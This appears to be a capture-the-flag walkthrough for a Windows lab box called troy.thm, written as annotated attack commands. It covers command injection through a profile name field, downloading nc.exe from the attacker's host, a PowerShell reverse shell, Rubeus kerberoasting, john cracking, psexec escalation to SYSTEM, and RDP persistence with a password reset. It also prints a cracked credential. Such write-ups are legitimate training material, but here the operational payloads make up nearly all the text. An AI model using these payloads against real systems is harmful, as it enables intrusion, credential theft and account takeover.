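# basic port scan (attack machine)
# -Pn: skip host discovery (Windows hosts commonly drop ICMP, so a ping-gated
#      scan would report the host down); -sV/-sC: version detection + default
#      scripts. -T5 is fast but drops/retransmits probes over a laggy VPN link
#      and can miss ports or mis-identify versions; -T4 is the usual compromise.
# -oA writes normal/grepable/XML output so the results can be re-read later
#      without rescanning. sudo is needed for the default SYN scan.
sudo nmap -Pn -sV -sC -T4 -oA initial <target-ip>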
Port 80 is the interesting service: a web application. Register an account and open the profile page. In the browser dev tools (Network tab), block the request for script.js and reload the page — presumably that script enforces client-side restrictions on the profile form, and with it gone the form submits whatever you type.
The "change name" field is then the injection point: its value appears to be passed into a server-side shell command, so prefixing the payload with a pipe (`cheese | …`, as below) gives remote command execution on the host.
# reverse shell listener (attack machine)
# -n: no DNS, -v: verbose, -l/-p: listen on the port the payload below dials back to
nc -nvlp 9001
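# Payloads typed into the profile "change name" field. "cheese |" satisfies
# whatever the server prepends to the value and pipes into our command, which
# then runs on the Windows host as the web application's user.
#
# Before sending the first payload, serve nc.exe from the attack machine on the
# port referenced below, e.g. `python3 -m http.server 8000` run in the directory
# that holds nc.exe. In PowerShell `curl` is an alias of Invoke-WebRequest; the
# explicit -OutFile removes any reliance on parameter-prefix matching for -o.
# upload nc executable (name field)
cheese | powershell curl <attack-ip>:8000/nc.exe -OutFile nc.exe
# engage reverse shell (name field) -- start the nc listener first;
# nc.exe -e attaches powershell's stdin/stdout to the connection
cheese | nc.exe <attack-ip> 9001 -e powershell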
A Windows (PowerShell) foothold is now established, running as whatever account the web application runs under.
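# In the reverse shell on the target: fetch Rubeus.exe (from the
# GhostPack/Ghostpack-CompiledBinaries repository), served from the attack
# machine the same way nc.exe was. <port> must match the HTTP server you
# started there. -OutFile is the explicit form of the -o used with curl above.
curl <attack-ip>:<port>/Rubeus.exe -OutFile Rubeus.exe
# dump kerberoast user hash: request TGS tickets for every SPN-bearing account
# and print the RC4/AES hashes; /nowrap keeps each hash on one line so it can
# be copied straight into john (add /outfile:<file> to write them to disk instead)
.\Rubeus.exe kerberoast /nowrap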
# crack the TGS hash offline (attack machine); "hash" is a file holding the
# $krb5tgs$… line(s) copied from the Rubeus output. `john --show --format=krb5tgs hash`
# re-prints the cracked credentials later.
john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash
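# deploy impacket psexec (attack machine). Cracked credential: achilles /
# winniethepooh on troy.thm. psexec.py needs write access to ADMIN$ over SMB, so
# this only works because achilles evidently holds admin rights on the target.
# Leaving the password out of the argument list makes psexec prompt for it,
# keeping it out of shell history and `ps` output; the original one-liner was
#   python3 psexec.py troy.thm/achilles:winniethepooh@<target-ip>
# (on some installs the script is on PATH as impacket-psexec).
python3 psexec.py troy.thm/achilles@<target-ip>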
Successfully elevated to NT AUTHORITY\SYSTEM: psexec.py uploads a service binary over SMB and starts it as a service, so the shell it returns runs as SYSTEM.
# become king -- in the SYSTEM cmd shell psexec returned, drop the marker file
# at the drive root
cd /d C:\
echo <name> > C:\king.txt
# find flags -- /s recurses from the current directory (C:\ after the cd above),
# then print the one on the user's desktop
dir /s flag*.txt
type C:\Users\<user>\Desktop\flag.txt
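# setup rdp and access machine. The two `net` commands run in the SYSTEM shell
# on the target; xfreerdp runs on the attack machine.
# NOTE: resetting the account password is destructive (it locks the real user
# out and is noisy on a shared box). The cracked password from john presumably
# still works for RDP, so only reset if it is actually needed. If achilles is a
# domain account and this host is not the DC, add /domain to the net user call.
net localgroup "Remote Desktop Users" achilles /add
net user achilles <newpassword>
# substitute the same value used for <newpassword> above; xfreerdp may also
# prompt to accept the host's self-signed certificate
xfreerdp /u:achilles /p:<newpassword> /v:<target-ip> /size:90%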